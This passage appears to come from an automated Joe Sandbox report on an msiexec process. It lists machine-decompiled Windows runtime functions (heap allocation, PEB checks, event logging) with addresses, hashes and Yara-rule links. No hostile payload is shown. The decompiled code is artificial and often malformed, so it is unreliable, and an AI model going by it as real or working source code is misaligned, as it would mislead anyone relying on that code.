				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04D2C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4ce11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E04DD88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                              0x04d2c577
                              0x04d2c57d
                              0x04d2c581
                              0x04d2c5b5
                              0x04d2c5b9
                              0x04d2c5ce
                              0x04d2c5ce
                              0x04d2c5ca
                              0x00000000
                              0x04d2c5ca
                              0x04d2c5c4
                              0x04d2c5c8
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d2c5ad
                              0x00000000
                              0x04d2c5af

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 49c32de8a85aac9e5c44ce4f5d99d68dcdfe484e56f05cee7a6e8ea53ec73d8d
                              • Instruction ID: 9c2a8790ab506d1f8e5d571fd03f61dcc67194d0d6f1dd4588e68eccc24faf92
                              • Opcode Fuzzy Hash: 49c32de8a85aac9e5c44ce4f5d99d68dcdfe484e56f05cee7a6e8ea53ec73d8d
                              • Instruction Fuzzy Hash: A0F090B2A356B29EE7369B14C20CB2A7BD4AB25F7CF484466E45587105D6A4FC80C261
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DD8D34 Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              C-Code - Quality: 43%
                              			E04DD8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x4dfd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04D27D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                              0x04dd8d34
                              0x04dd8d43
                              0x04dd8d4b
                              0x04dd8d4e
                              0x04dd8d52
                              0x04dd8d5c
                              0x04dd8d6e
                              0x04dd8d5e
                              0x04dd8d67
                              0x04dd8d67
                              0x04dd8d79
                              0x04dd8d7a
                              0x04dd8d7c
                              0x04dd8d81
                              0x04dd8d94

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1d0408dcca8d5fcc7c23f64d0a4029bd8b109f31da998c2f5ce42094aaa25d83
                              • Instruction ID: d5255a2e9ca51e8ceed6f1517674a016e89424dc1b065526d4935e50252ff634
                              • Opcode Fuzzy Hash: 1d0408dcca8d5fcc7c23f64d0a4029bd8b109f31da998c2f5ce42094aaa25d83
                              • Instruction Fuzzy Hash: 43F09070E046089FDB14EBB8D542B6E77B4EB54704F508099E916AB281EA34E9009764
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DC2073 Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              C-Code - Quality: 94%
                              			E04DC2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E04DBFD22(__ecx);
				_t19 =  *0x4df849c - _t3; // 0x637a23c5
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4df8748; // 0x0
					if(__eflags <= 0) {
						E04DC1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4df8724 & 0x00000004;
							if(( *0x4df8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4df8724; // 0x0
					return E04DB8DF1(__ebx, 0xc0000374, 0x4df5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                              0x04dc2076
                              0x04dc2078
                              0x04dc207d
                              0x04dc2083
                              0x04dc20a4
                              0x04dc20aa
                              0x04dc20ac
                              0x04dc20b7
                              0x04dc20ba
                              0x04dc20bc
                              0x04dc20c9
                              0x04dc20c9
                              0x04dc20d0
                              0x04dc20d2
                              0x00000000
                              0x04dc20d2
                              0x04dc20be
                              0x04dc20c3
                              0x04dc20c5
                              0x04dc20c7
                              0x00000000
                              0x00000000
                              0x04dc20c7
                              0x04dc20bc
                              0x04dc20d4
                              0x04dc2085
                              0x04dc2085
                              0x04dc20a3
                              0x04dc20a3

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 31d01acf324e4f4faad528f4763707f7b1fc08dcf927f0509ed5438fbe594f0a
                              • Instruction ID: c4e246aaefa7e54abefdc8b458a4e72cb7b73b42329405a3d5cb82d5807030d9
                              • Opcode Fuzzy Hash: 31d01acf324e4f4faad528f4763707f7b1fc08dcf927f0509ed5438fbe594f0a
                              • Instruction Fuzzy Hash: B3F02726E115868AEF32BF2575203D16F90E745318F0904CFF89017701C638AC83FE61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D4927A Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              C-Code - Quality: 54%
                              			E04D4927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E04D4FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E04D492C6(_t11, _t14);
				}
				return _t11;
			}





                              0x04d49295
                              0x04d49299
                              0x04d4929f
                              0x04d492aa
                              0x04d492ad
                              0x04d492ae
                              0x04d492af
                              0x04d492b0
                              0x04d492b4
                              0x04d492bb
                              0x04d492bb
                              0x04d492c5

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                              • Instruction ID: ad52b99ec4bc82275afc475b3f3f575c376a601f1946b195dae09290f50a2112
                              • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                              • Instruction Fuzzy Hash: 05E06D723406406BE7219F5ADCD4B5776A9EFC2729F0440B9B9045E292CAE6E9098BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DD8CD6 Relevance: .0, Instructions: 31COMMON
                              Download Yara Rule
                              C-Code - Quality: 36%
                              			E04DD8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4dfd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04D27D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                              0x04dd8ce5
                              0x04dd8ced
                              0x04dd8cf0
                              0x04dd8cfb
                              0x04dd8d0d
                              0x04dd8cfd
                              0x04dd8d06
                              0x04dd8d06
                              0x04dd8d18
                              0x04dd8d19
                              0x04dd8d1b
                              0x04dd8d20
                              0x04dd8d33

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d36ea1034f1c9117015c1dff07bb151c68db34bebb4bcffb92ca22891bbfbf94
                              • Instruction ID: 53bfed6e6c28416442f2c8299683631b12fa3b60f709e7392651262185cc6406
                              • Opcode Fuzzy Hash: d36ea1034f1c9117015c1dff07bb151c68db34bebb4bcffb92ca22891bbfbf94
                              • Instruction Fuzzy Hash: 13F08270A04248AFDB04EBB9D956E6E77B8EF58304F50019AF916EB3C1EA34E900D764
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D2746D Relevance: .0, Instructions: 31COMMON
                              Download Yara Rule
                              C-Code - Quality: 88%
                              			E04D2746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E04D1EB70(__ecx, 0x4df79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E04D495D0();
							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                              0x04d2746d
                              0x04d2746d
                              0x04d2746d
                              0x04d27471
                              0x04d27488
                              0x04d6f92d
                              0x04d2748e
                              0x04d27491
                              0x04d27495
                              0x04d6f937
                              0x04d6f93a
                              0x04d6f94e
                              0x04d6f953
                              0x04d6f956
                              0x04d6f956
                              0x04d27495
                              0x00000000
                              0x04d27488
                              0x04d27473
                              0x04d27478
                              0x04d2747d
                              0x04d27481
                              0x00000000
                              0x04d27481
                              0x04d2747d
                              0x04d2747a
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 72543fb72746d986854a30646ff8469284df3ceb0b1531d0a33e4fb13059fefb
                              • Instruction ID: 9613e11f43787ffb1b2a834dfbf7394dcb6a51827b8152fb59416780d137a9a8
                              • Opcode Fuzzy Hash: 72543fb72746d986854a30646ff8469284df3ceb0b1531d0a33e4fb13059fefb
                              • Instruction Fuzzy Hash: 9BF0B434B44964ABDF219B68CA40B797BA1BF2531CF040256D891AB160F724F8028795
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D04F2E Relevance: .0, Instructions: 31COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D04F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E04DD88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E04D2C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4ce1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                              0x04d04f2e
                              0x04d04f34
                              0x04d04f38
                              0x04d60b85
                              0x04d60b85
                              0x04d60b89
                              0x04d60b9a
                              0x04d60b9a
                              0x04d60b9f
                              0x00000000
                              0x04d60b9f
                              0x04d60b94
                              0x04d60b98
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d60b98
                              0x04d04f3e
                              0x04d04f48
                              0x00000000
                              0x04d04f6e
                              0x00000000
                              0x04d04f70

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c2657a0150dbe9f97f2dce8c61382ceada34d05b63c94ec63c44e860cd75cefa
                              • Instruction ID: ddf8be8dc0243342ff1f4c568abe6b62babaa4f473b086dcd9465a36c6e84939
                              • Opcode Fuzzy Hash: c2657a0150dbe9f97f2dce8c61382ceada34d05b63c94ec63c44e860cd75cefa
                              • Instruction Fuzzy Hash: 8CF0BE32A256948FE762DB1CC184B26B7D8FB017B8F048465D40787920C724FC44C654
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DD8B58 Relevance: .0, Instructions: 31COMMON
                              Download Yara Rule
                              C-Code - Quality: 36%
                              			E04DD8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4dfd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04D27D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                              0x04dd8b67
                              0x04dd8b6f
                              0x04dd8b72
                              0x04dd8b7d
                              0x04dd8b8f
                              0x04dd8b7f
                              0x04dd8b88
                              0x04dd8b88
                              0x04dd8b9a
                              0x04dd8b9b
                              0x04dd8b9d
                              0x04dd8ba2
                              0x04dd8bb5

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 20d799ead46bd3711dae0b1103014c59aa7082d6cafaa36cb6bc4d0b2dacaf07
                              • Instruction ID: 506b00a78d621607705cc744000280ff4a06060055b9c1d331276f7b48026458
                              • Opcode Fuzzy Hash: 20d799ead46bd3711dae0b1103014c59aa7082d6cafaa36cb6bc4d0b2dacaf07
                              • Instruction Fuzzy Hash: 86F089B0B042589BDB10EBB4D516E6E77B4EF44304F440459B915DB3C1EA74E900D754
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D3A44B Relevance: .0, Instructions: 29COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D3A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x4df7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E04D4FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                              0x04d3a44b
                              0x04d3a453
                              0x04d3a472
                              0x04d3a476
                              0x00000000
                              0x04d3a493
                              0x04d3a47a
                              0x04d3a47f
                              0x04d3a486
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c2bf8c9fb3e2880d2aeeb2caab186fe9495f037a192430f0f59350465f4d4354
                              • Instruction ID: cfe4b46c728965cfb5313811f63d9f1b270c529da149704c93538916bb0afb91
                              • Opcode Fuzzy Hash: c2bf8c9fb3e2880d2aeeb2caab186fe9495f037a192430f0f59350465f4d4354
                              • Instruction Fuzzy Hash: 8DE09272B01421ABE2219B18EC00FA673ADEBE5656F094039E948C7354D628ED01C7E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D0F358 Relevance: .0, Instructions: 28COMMON
                              Download Yara Rule
                              C-Code - Quality: 79%
                              			E04D0F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E04D3F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04D24620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                              0x04d0f35d
                              0x04d0f361
                              0x04d0f367
                              0x04d0f372
                              0x04d0f38c
                              0x04d0f38c
                              0x04d0f394

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                              • Instruction ID: 17abc21cb0f4491aa914d157e8a26ac689138370b4d1d0351d57f6e1e4fc4b81
                              • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                              • Instruction Fuzzy Hash: 13E0D832A41218BBDF3197D99E05F9ABBACDB44B61F104159F904D7190D561AE00C6D0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D1FF60 Relevance: .0, Instructions: 22COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D1FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x4ce11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E04DD88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04D20050(_t14);
				}
			}










                              0x04d1ff66
                              0x04d1ff6b
                              0x00000000
                              0x04d1ff8f
                              0x00000000
                              0x04d1ff8f

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8a2f98eb919aaf1029673655775c936b68796eede27bb58f8871dda0ad37e017
                              • Instruction ID: 0c75d30d99c7ad47956a18846e4f4b8934f152789b16801a95f6390a001501ab
                              • Opcode Fuzzy Hash: 8a2f98eb919aaf1029673655775c936b68796eede27bb58f8871dda0ad37e017
                              • Instruction Fuzzy Hash: 60E0DFB1309205AFE735DB52F140F293B98FB42729F19801FF80A4B121C662F888C216
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D941E8 Relevance: .0, Instructions: 21COMMON
                              Download Yara Rule
                              C-Code - Quality: 82%
                              			E04D941E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x4de08f0);
				_t5 = E04D5D08C(__ebx, __edi, __esi);
				if( *0x4df87ec == 0) {
					E04D1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x4df87ec == 0) {
						 *0x4df87f0 = 0x4df87ec;
						 *0x4df87ec = 0x4df87ec;
						 *0x4df87e8 = 0x4df87e4;
						 *0x4df87e4 = 0x4df87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04D94248();
				}
				return E04D5D0D1(_t5);
			}





                              0x04d941e8
                              0x04d941ea
                              0x04d941ef
                              0x04d941fb
                              0x04d94206
                              0x04d9420b
                              0x04d94216
                              0x04d9421d
                              0x04d94222
                              0x04d9422c
                              0x04d94231
                              0x04d94231
                              0x04d94236
                              0x04d9423d
                              0x04d9423d
                              0x04d94247

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1d810b451e01aa8d9e8766da8a757b81f3ae1476197d3191e7faf8a57b70cf60
                              • Instruction ID: 621170aef587da182a5f5dcdfe53f87026370b376c03f8bd296ab286bdba5439
                              • Opcode Fuzzy Hash: 1d810b451e01aa8d9e8766da8a757b81f3ae1476197d3191e7faf8a57b70cf60
                              • Instruction Fuzzy Hash: 6AF0F274A11B009EEBB0FFAAA52071436B4F744328F10812AA50086394C7786886EF22
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DBD380 Relevance: .0, Instructions: 21COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04DBD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L04D0E8B0(__ecx, _a4, 0xfff);
					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                              0x04dbd38a
                              0x04dbd39b
                              0x04dbd3b1
                              0x00000000
                              0x04dbd3b6
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                              • Instruction ID: 7eed117416a620f7296770501c23ca6ec87b3bfe65149ea44226b32428a5e09e
                              • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                              • Instruction Fuzzy Hash: 0EE08C31380614EBEB225E44CC00BA97B16EB907A4F104031FE495B791C679EC91E6E4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D3A185 Relevance: .0, Instructions: 20COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D3A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x4df67e4 >= 0xa) {
					if(_t5 < 0x4df6800 || _t5 >= 0x4df6900) {
						return L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04D20010(0x4df67e0, _t5);
				}
			}





                              0x04d3a190
                              0x04d3a1a6
                              0x04d3a1c2
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d3a192
                              0x04d3a192
                              0x04d3a19f
                              0x04d3a19f

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1502e42d56e91466e9bf2fa4224577224a57c726924c4e4938c0d5aae6833e9c
                              • Instruction ID: 5df64d0bc6f5e97d50a79a9f4f3f26b9be34cf77dace0a88f3076296c3f4934c
                              • Opcode Fuzzy Hash: 1502e42d56e91466e9bf2fa4224577224a57c726924c4e4938c0d5aae6833e9c
                              • Instruction Fuzzy Hash: 49D02B2132000026F63D9710AE14B2122E2E7D070DF310C0DF3431BF94DA50FCD28158
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D316E0 Relevance: .0, Instructions: 17COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D316E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04D31710(0x4df67e0);
